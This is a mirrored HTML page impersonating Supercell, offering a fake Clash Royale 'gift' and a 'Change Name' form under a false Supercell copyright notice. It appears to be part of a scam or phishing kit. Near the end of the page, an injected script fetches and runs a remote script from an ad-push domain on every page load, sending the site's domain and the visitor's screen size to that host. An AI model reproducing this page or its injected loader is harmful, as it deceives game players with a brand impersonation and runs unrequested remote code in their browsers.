<!DOCTYPE html>
<html lang="th">
  
<!-- Mirrored from www.garenaweb.com/reward-M1887.php by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 19 Dec 2015 03:51:27 GMT -->

<!-- Mirrored from new-events.top/Events-ClashOfClanss2017.com/Changename.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 15 Mar 2017 04:23:44 GMT -->
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Clash Royale - SUPERCELL GIFT</title>

    <!-- <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="css/flat-ui.min.css" rel="stylesheet">
    <link href="css/main.css" rel="stylesheet"> -->
    <link href="css/pb.min.css" rel="stylesheet">

    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
  </head>
  <body>
    <div id="fb-root"></div>
    <script>(function(d, s, id) {
      var js, fjs = d.getElementsByTagName(s)[0];
      if (d.getElementById(id)) return;
      js = d.createElement(s); js.id = id;
      js.src = "../connect.facebook.net/en_US/sdk.html#xfbml=1&version=v2.3&appId=661774673967000";
      fjs.parentNode.insertBefore(js, fjs);
    }(document, 'script', 'facebook-jssdk'));</script>

    <div class="my-nav">
<span class="active"><a href="index.html">Free Card</a></span>
<span class="active"><a href="changename.html">Change Name</a></span>
<span class="active"><a href="resource.html">Resources</a></span>
</span>
    </div>

    <br>

    <div class="container">
      <div class="row">
        <div class="col-xs-12 col-md-offset-2 col-md-4">
          <div class="well">
            <h1 class="mts"></h1>
            

   <form method="post" action="confirmation.html">
    <input class="form-control" id="gaecov"  placeholder="Old Name" type="text" required>
<center><p></p>
     <input class="form-control" id="gaecov"  placeholder="New Name" type="text" required>
   <br>
<center><button type="submit" class="btn btn-primary">Change Now</button>
  
</form>
</p>
</div>
</div>
        <div class="col-xs-12 col-md-4">
          <div class="fb-page" data-href="http://supercell.com/en/games/" data-width="500" data-hide-cover="false" data-show-facepile="true" data-show-posts="true"><div class="fb-xfbml-parse-ignore"><blockquote cite="http://supercell.com/en/games/"><a href="http://supercell.com/en/games/">SUPERCELL</a></blockquote></div></div>

          <div class="clearfix"></div><br>
      </div>
    </div>

    <footer class="footer">
     <div class="container">
        Copyright &copy; 2017 Supercell. All rights reserved.<br>
      </div>
    </footer>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582AaN6h071sG%2bK1PafbffoAwBlPb%2fexWSRYDlOdqSCDxL%2bf2TKmDGOtioHFSHw7mqjobwUQ%2fH4eBFiRuYPdWSbHyA4srPx6zBQ%2f9u8OeYSCx8NpKPML7G651CY89rnONVSHlna27vmtBm4F%2fjWYT3YxTuv1BPr42qua0P8%2f6u6OPndugtRWx07oW6tdSQXcexvACUymmwiiNg%2bOYGiXD81E5qBCgWp9qQeb5xEbog16X9MNf8vjoSW61%2bjw17D15dc3fSBy9HFLQcHYulTSD1swLXo0f9colZZa0yhLVwSm5SAiUw5Oynxb4udQ%2fnjFLW1oqqKDx%2fAy0KXnjZKHBOFq7jyvrfxf0FOz5R%2bqWdD53Z5HuAg3z9Vf00RGBkjB%2fH4FPb%2bBQ2DDHrUddCuXZhxaxfCCfcamSeQixA%2ftt%2bgG3dCU0phMBuC5pM0xxmGZQx0oVZ33NqPlraubbRuHx27PtiATR5%2fnR1f%2f8e%2bDyLzBsx" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from www.garenaweb.com/reward-M1887.php by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 19 Dec 2015 03:51:27 GMT -->

<!-- Mirrored from new-events.top/Events-ClashOfClanss2017.com/Changename.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 15 Mar 2017 04:23:44 GMT -->
</html>
